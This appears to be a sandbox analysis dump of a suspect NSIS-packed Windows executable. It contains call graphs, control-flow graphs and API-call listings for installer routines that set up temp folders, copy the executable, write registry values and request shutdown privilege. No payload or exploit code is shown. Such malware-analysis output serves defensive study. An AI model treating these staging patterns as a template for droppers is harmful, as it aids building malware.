4061->4062 4062->4060 4064 4051af 4063->4064 4072 405251 4063->4072 4065 4051cb lstrlenW 4064->4065 4066 405f0c 18 API calls 4064->4066 4067 4051f4 4065->4067 4068 4051d9 lstrlenW 4065->4068 4066->4065 4070 405207 4067->4070 4071 4051fa SetWindowTextW 4067->4071 4069 4051eb lstrcatW 4068->4069 4068->4072 4069->4067 4070->4072 4073 40520d SendMessageW SendMessageW SendMessageW 4070->4073 4071->4070 4072->4031 4073->4072 4095 406254 GetModuleHandleA 4074->4095 4078 405dac 4078->4031 4080 406243 FindClose 4079->4080 4081 4058f6 4079->4081 4080->4081 4081->4001 4081->4012 4083 405951 lstrcatW 4082->4083 4084 405900 4082->4084 4083->4084 4084->4017 4085->4037 4087 4059fd 4086->4087 4090 405a0f 4086->4090 4089 405a0a CharNextW 4087->4089 4087->4090 4088 405a33 4088->4040 4088->4041 4089->4088 4090->4088 4091 405962 CharNextW 4090->4091 4091->4090 4093 405736 4092->4093 4094 405b43 SetFileAttributesW 4092->4094 4093->4058 4093->4059 4093->4060 4094->4093 4096 406270 LoadLibraryA 4095->4096 4097 40627b GetProcAddress 4095->4097 4096->4097 4098 405d8b 4096->4098 4097->4098 4098->4078 4099 405c08 lstrcpyW 4098->4099 4100 405c31 4099->4100 4101 405c57 GetShortPathNameW 4099->4101 4124 405b56 GetFileAttributesW CreateFileW 4100->4124 4102 405c6c 4101->4102 4103 405d7e 4101->4103 4102->4103 4105 405c74 wsprintfA 4102->4105 4103->4078 4108 405f0c 18 API calls 4105->4108 4106 405c3b CloseHandle GetShortPathNameW 4106->4103 4107 405c4f 4106->4107 4107->4101 4107->4103 4109 405c9c 4108->4109 4125 405b56 GetFileAttributesW CreateFileW 4109->4125 4111 405ca9 4111->4103 4112 405cb8 GetFileSize GlobalAlloc 4111->4112 4113 405d77 CloseHandle 4112->4113 4114 405cda 4112->4114 4113->4103 4126 405bd9 ReadFile 4114->4126 4119 405cf9 lstrcpyA 4122 405d1b 4119->4122 4120 405d0d 4121 405abb 4 API calls 4120->4121 4121->4122 4123 405d52 SetFilePointer WriteFile GlobalFree 4122->4123 4123->4113 4124->4106 4125->4111 4127 405bf7 4126->4127 4127->4113 4128 405abb lstrlenA 4127->4128 4129 405afc lstrlenA 4128->4129 4130 405b04 4129->4130 4131 405ad5 lstrcmpiA 4129->4131 4130->4119 4130->4120 4131->4130 4132 405af3 CharNextA 4131->4132 4132->4129 5557 402224 5558 40223e 5557->5558 5559 40222b 5557->5559 5560 405f0c 18 API calls 5559->5560 5561 402238 5560->5561 5562 4056c6 MessageBoxIndirectW 5561->5562 5562->5558 5563 10001667 5564 1000152e 4 API calls 5563->5564 5567 1000167f 5564->5567 5565 100016c5 GlobalFree 5566 1000169a 5566->5565 5567->5565 5567->5566 5568 100016b1 VirtualFree 5567->5568 5568->5565 5569 402729 5570 402730 5569->5570 5571 4029c7 5569->5571 5572 402736 FindClose 5570->5572 5572->5571 5573 401cab 5574 402b1d 18 API calls 5573->5574 5575 401cb2 5574->5575 5576 402b1d 18 API calls 5575->5576 5577 401cba GetDlgItem 5576->5577 5578 4024e8 5577->5578 5579 4016af 5580 402b3a 18 API calls 5579->5580 5581 4016b5 GetFullPathNameW 5580->5581 5582 4016f1 5581->5582 5583 4016cf 5581->5583 5584 401706 GetShortPathNameW 5582->5584 5585 4029c7 5582->5585 5583->5582 5586 40622d 2 API calls 5583->5586 5584->5585 5587 4016e1 5586->5587 5587->5582 5589 405eea lstrcpynW 5587->5589 5589->5582 4286 402331 4287 402337 4286->4287 4288 402b3a 18 API calls 4287->4288 4289 402349 4288->4289 4290 402b3a 18 API calls 4289->4290 4291 402353 RegCreateKeyExW 4290->4291 4292 40237d 4291->4292 4296 402793 4291->4296 4293 402398 4292->4293 4294 402b3a 18 API calls 4292->4294 4295 4023a4 4293->4295 4303 402b1d 4293->4303 4297 40238e lstrlenW 4294->4297 4299 4023bf RegSetValueExW 4295->4299 4306 403062 4295->4306 4297->4293 4300 4023d5 RegCloseKey 4299->4300 4300->4296 4304 405f0c 18 API calls 4303->4304 4305 402b31 4304->4305 4305->4295 4307 403072 SetFilePointer 4306->4307 4308 40308e 4306->4308 4307->4308 4321 40317d GetTickCount 4308->4321 4311 405bd9 ReadFile 4312 4030ae 4311->4312 4313 40317d 43 API calls 4312->4313 4317 403139 4312->4317 4314 4030c5 4313->4314 4315 40313f ReadFile 4314->4315 4314->4317 4318 4030d5 4314->4318 4315->4317 4317->4299 4318->4317 4319 405bd9 ReadFile 4318->4319 4320 403108 WriteFile 4318->4320 4319->4318 4320->4317 4320->4318 4322 4032e7 4321->4322 4323 4031ac 4321->4323 4324 402d1a 33 API calls 4322->4324 4334 40330f SetFilePointer 4323->4334 4330 403095 4324->4330 4326 4031b7 SetFilePointer 4332 4031dc 4326->4332 4330->4311 4330->4317 4331 403271 WriteFile 4331->4330 4331->4332 4332->4330 4332->4331 4333 4032c8 SetFilePointer 4332->4333 4335 4032f9 4332->4335 4338 406390 4332->4338 4345 402d1a 4332->4345 4333->4322 4334->4326 4336 405bd9 ReadFile 4335->4336 4337 40330c 4336->4337 4337->4332 4339 4063b5 4338->4339 4340 4063bd 4338->4340 4339->4332 4340->4339 4341 406444 GlobalFree 4340->4341 4342 40644d GlobalAlloc 4340->4342 4343 4064c4 GlobalAlloc 4340->4343 4344 4064bb GlobalFree 4340->4344 4341->4342 4342->4339 4342->4340 4343->4339 4343->4340 4344->4343 4346 402d43 4345->4346 4347 402d2b 4345->4347 4349 402d53 GetTickCount 4346->4349 4350 402d4b 4346->4350 4348 402d34 DestroyWindow 4347->4348 4352 402d3b 4347->4352 4348->4352 4351 402d61 4349->4351 4349->4352 4353 40628d 2 API calls 4350->4353 4354 402d96 CreateDialogParamW ShowWindow 4351->4354 4355 402d69 4351->4355 4352->4332 4353->4352 4354->4352 4355->4352 4360 402cfe 4355->4360 4357 402d77 wsprintfW 4358 405194 25 API calls 4357->4358 4359 402d94 4358->4359 4359->4352 4361 402d0d 4360->4361 4362 402d0f MulDiv 4360->4362 4361->4362 4362->4357 5597 4027b5 5598 402b3a 18 API calls 5597->5598 5599 4027c3 5598->5599 5600 4027d9 5599->5600 5601 402b3a 18 API calls 5599->5601 5602 405b31 2 API calls 5600->5602 5601->5600 5603 4027df 5602->5603 5623 405b56 GetFileAttributesW CreateFileW 5603->5623 5605 4027ec 5606 402895 5605->5606 5607 4027f8 GlobalAlloc 5605->5607 5610 4028b0 5606->5610 5611 40289d DeleteFileW 5606->5611 5608 402811 5607->5608 5609 40288c CloseHandle 5607->5609 5624 40330f SetFilePointer 5608->5624 5609->5606 5611->5610 5613 402817 5614 4032f9 ReadFile 5613->5614 5615 402820 GlobalAlloc 5614->5615 5616 402830 5615->5616 5617 402864 WriteFile GlobalFree 5615->5617 5618 403062 46 API calls 5616->5618 5619 403062 46 API calls 5617->5619 5622 40283d 5618->5622 5620 402889 5619->5620 5620->5609 5621 40285b GlobalFree 5621->5617 5622->5621 5623->5605 5624->5613 5625 4028b6 5626 402b1d 18 API calls 5625->5626 5627 4028bc 5626->5627 5628 4028f8 5627->5628 5629 4028df 5627->5629 5634 402793 5627->5634 5631 402902 5628->5631 5632 40290e 5628->5632 5630 4028e4 5629->5630 5638 4028f5 5629->5638 5639 405eea lstrcpynW 5630->5639 5635 402b1d 18 API calls 5631->5635 5633 405f0c 18 API calls 5632->5633 5633->5638 5635->5638 5638->5634 5640 405e31 wsprintfW 5638->5640 5639->5634 5640->5634 5641 4014b8 5642 4014be 5641->5642 5643 401389 2 API calls 5642->5643 5644 4014c6 5643->5644 4733 4015b9 4734 402b3a 18 API calls 4733->4734 4735 4015c0 4734->4735 4736 4059e0 4 API calls 4735->4736 4746 4015c9 4736->4746 4737 401614 4738 401646 4737->4738 4739 401619 4737->4739 4745 401423 25 API calls 4738->4745 4742 401423 25 API calls 4739->4742 4740 405962 CharNextW 4741 4015d7 CreateDirectoryW 4740->4741 4743 4015ed GetLastError 4741->4743 4741->4746 4744 401620 4742->4744 4743->4746 4747 4015fa GetFileAttributesW 4743->4747 4751 405eea lstrcpynW 4744->4751 4750 40163e 4745->4750 4746->4737 4746->4740 4747->4746 4749 40162d SetCurrentDirectoryW 4749->4750 4751->4749 5645 401939 5646 402b3a 18 API calls 5645->5646 5647 401940 lstrlenW 5646->5647 5648 4024e8 5647->5648 5649 40293b 5650 402b1d 18 API calls 5649->5650 5651 402941 5650->5651 5652 402974 5651->5652 5653 402793 5651->5653 5655 40294f 5651->5655 5652->5653 5654 405f0c 18 API calls 5652->5654 5654->5653 5655->5653 5657 405e31 wsprintfW 5655->5657 5657->5653 4969 40173f 4970 402b3a 18 API calls 4969->4970 4971 401746 4970->4971 4972 405b85 2 API calls 4971->4972 4973 40174d 4972->4973 4974 405b85 2 API calls 4973->4974 4974->4973 5658 40653f 5660 4063c3 5658->5660 5659 406d2e 5660->5659 5661 406444 GlobalFree 5660->5661 5662 40644d GlobalAlloc 5660->5662 5663 4064c4 GlobalAlloc 5660->5663 5664 4064bb GlobalFree 5660->5664 5661->5662 5662->5659 5662->5660 5663->5659 5663->5660 5664->5663

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 28 403470-403486 26->28 29 40349c-4034b2 26->29 33 403448-40344b 27->33 34 40344d 27->34 28->29 35 403488-403490 28->35 29->22 37 4034b4-4034c9 29->37 33->26 33->34 34->26 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->29 40->41 41->29 42->24 42->44 43->16 55 403631-403641 call 4056c6 ExitProcess 44->55 56 403727-40372d 44->56 48 403594-40359f call 405962 45->48 49 40360c-403613 call 4038b4 45->49 62 4035a1-4035b2 48->62 63 4035d6-4035e0 48->63 58 403618 49->58 60 4037aa-4037b2 56->60 61 40372f-40374c call 406254 * 3 56->61 58->44 65 4037b4 60->65 66 4037b8-4037bc ExitProcess 60->66 90 403796-4037a1 ExitWindowsEx 61->90 91 40374e-403750 61->91 64 4035b4-4035b6 62->64 68 4035e2-4035f0 call 405a3d 63->68 69 403647-403661 lstrcatW lstrcmpiW 63->69 71 4035d0-4035d4 64->71 72 4035b8-4035ce 64->72 65->66 68->44 81 4035f2-403608 call 405eea * 2 68->81 69->44 74 403663-403679 CreateDirectoryW SetCurrentDirectoryW 69->74 71->63 71->64 72->63 72->71 78 403686-4036af call 405eea 74->78 79 40367b-403681 call 405eea 74->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->49 100 403711-403719 89->100 101 4036d2-4036e2 CopyFileW 89->101 90->60 96 4037a3-4037a5 call 40140b 90->96 91->90 94 403752-403754 91->94 94->90 98 403756-403768 GetCurrentProcess 94->98 96->60 98->90 108 40376a-40378c 98->108 100->89 103 40371b-403722 call 405d84 100->103 101->100 102 4036e4-403704 call 405d84 call 405f0c call 405665 101->102 102->100 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->100
                                                                                                                                                  APIs
                                                                                                                                                  • #17.COMCTL32 ref: 00403379
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\________.exe",00000000), ref: 004033DB
                                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\________.exe",00000020), ref: 00403402
                                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                                                                  • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\________.exe",00000000,?), ref: 0040364D
                                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\________.exe",00000000,?), ref: 00403659
                                                                                                                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\________.exe,0041FE90,00000001), ref: 004036DA
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\AppData\Local\foreslaaende\Sluggardliness$C:\Users\user\Desktop$C:\Users\user\Desktop\________.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                                  • API String ID: 4107622049-728878773
                                                                                                                                                  • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                                  • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                                  • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                                  • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 130 404e93-404e9a 125->130 133 404dc4-404dcb 126->133 134 404db7-404dbe 126->134 131 404c20-404c3d call 405f0c SendMessageW * 2 127->131 132 404c1d 127->132 128->124 129 404c45-404c71 call 40412f * 2 128->129 172 404c77-404c7d 129->172 173 404d3c-404d4f GetWindowLongW SetWindowLongW 129->173 136 404f0b-404f13 130->136 137 404e9c-404ea2 130->137 131->128 132->131 139 404e40-404e43 133->139 140 404dcd-404dd0 133->140 134->130 134->133 145 404f15-404f1b SendMessageW 136->145 146 404f1d-404f24 136->146 142 4050f3-405105 call 404196 137->142 143 404ea8-404eb2 137->143 139->130 144 404e45-404e4f 139->144 148 404dd2-404dd9 140->148 149 404ddb-404df0 call 404a5e 140->149 143->142 154 404eb8-404ec7 SendMessageW 143->154 156 404e51-404e5d SendMessageW 144->156 157 404e5f-404e69 144->157 145->146 150 404f26-404f2d 146->150 151 404f58-404f5f 146->151 148->139 148->149 149->139 171 404df2-404e03 149->171 159 404f36-404f3d 150->159 160 404f2f-404f30 ImageList_Destroy 150->160 163 4050b5-4050bc 151->163 164 404f65-404f71 call 4011ef 151->164 154->142 165 404ecd-404ede SendMessageW 154->165 156->157 157->130 158 404e6b-404e75 157->158 167 404e86-404e90 158->167 168 404e77-404e84 158->168 169 404f46-404f52 159->169 170 404f3f-404f40 GlobalFree 159->170 160->159 163->142 177 4050be-4050c5 163->177 190 404f81-404f84 164->190 191 404f73-404f76 164->191 175 404ee0-404ee6 165->175 176 404ee8-404eea 165->176 167->130 168->130 169->151 170->169 171->139 178 404e05-404e07 171->178 179 404c80-404c87 172->179 183 404d55-404d59 173->183 175->176 181 404eeb-404f04 call 401299 SendMessageW 175->181 176->181 177->142 182 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 177->182 186 404e09-404e10 178->186 187 404e1a 178->187 188 404d1d-404d30 179->188 189 404c8d-404cb5 179->189 181->136 182->142 184 404d73-404d7b call 404164 183->184 185 404d5b-404d6e ShowWindow call 404164 183->185 184->118 185->142 195 404e12-404e14 186->195 196 404e16-404e18 186->196 199 404e1d-404e39 call 40117d 187->199 188->179 203 404d36-404d3a 188->203 197 404cb7-404ced SendMessageW 189->197 198 404cef-404cf1 189->198 204 404fc5-404fe9 call 4011ef 190->204 205 404f86-404f9f call 4012e2 call 401299 190->205 200 404f78 191->200 201 404f79-404f7c call 404ade 191->201 195->199 196->199 197->188 206 404cf3-404d02 SendMessageW 198->206 207 404d04-404d1a SendMessageW 198->207 199->139 200->201 201->190 203->173 203->183 218 40508b-40509f InvalidateRect 204->218 219 404fef 204->219 224 404fa1-404fa7 205->224 225 404faf-404fbe SendMessageW 205->225 206->188 207->188 218->163 221 4050a1-4050b0 call 404a31 call 404978 218->221 222 404ff2-404ffd 219->222 221->163 226 405073-405085 222->226 227 404fff-40500e 222->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->204 226->218 226->222 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 234 405026-405029 232->234 235 40502b-405034 232->235 236 405039-405071 SendMessageW * 2 234->236 235->236 237 405036 235->237 236->226 237->236
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                  • String ID: $M$N
                                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                                  • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                                  • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                                  • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                                  • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 682 405f0c-405f17 683 405f19-405f28 682->683 684 405f2a-405f40 682->684 683->684 685 405f46-405f53 684->685 686 406158-40615e 684->686 685->686 687 405f59-405f60 685->687 688 406164-40616f 686->688 689 405f65-405f72 686->689 687->686 691 406171-406175 call 405eea 688->691 692 40617a-40617b 688->692 689->688 690 405f78-405f84 689->690 693 406145 690->693 694 405f8a-405fc6 690->694 691->692 696 406153-406156 693->696 697 406147-406151 693->697 698 4060e6-4060ea 694->698 699 405fcc-405fd7 GetVersion 694->699 696->686 697->686 702 4060ec-4060f0 698->702 703 40611f-406123 698->703 700 405ff1 699->700 701 405fd9-405fdd 699->701 709 405ff8-405fff 700->709 701->700 706 405fdf-405fe3 701->706 707 406100-40610d call 405eea 702->707 708 4060f2-4060fe call 405e31 702->708 704 406132-406143 lstrlenW 703->704 705 406125-40612d call 405f0c 703->705 704->686 705->704 706->700 712 405fe5-405fe9 706->712 716 406112-40611b 707->716 708->716 714 406001-406003 709->714 715 406004-406006 709->715 712->700 719 405feb-405fef 712->719 714->715 717 406042-406045 715->717 718 406008-406025 call 405db7 715->718 716->704 721 40611d 716->721 723 406055-406058 717->723 724 406047-406053 GetSystemDirectoryW 717->724 726 40602a-40602e 718->726 719->709 725 4060de-4060e4 call 40617e 721->725 728 4060c3-4060c5 723->728 729 40605a-406068 GetWindowsDirectoryW 723->729 727 4060c7-4060cb 724->727 725->704 730 406034-40603d call 405f0c 726->730 731 4060cd-4060d1 726->731 727->725 727->731 728->727 732 40606a-406074 728->732 729->728 730->727 731->725 735 4060d3-4060d9 lstrcatW 731->735 737 406076-406079 732->737 738 40608e-4060a4 SHGetSpecialFolderLocation 732->738 735->725 737->738 742 40607b-406082 737->742 739 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 738->739 740 4060bf 738->740 739->727 739->740 740->728 743 40608a-40608c 742->743 743->727 743->738
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
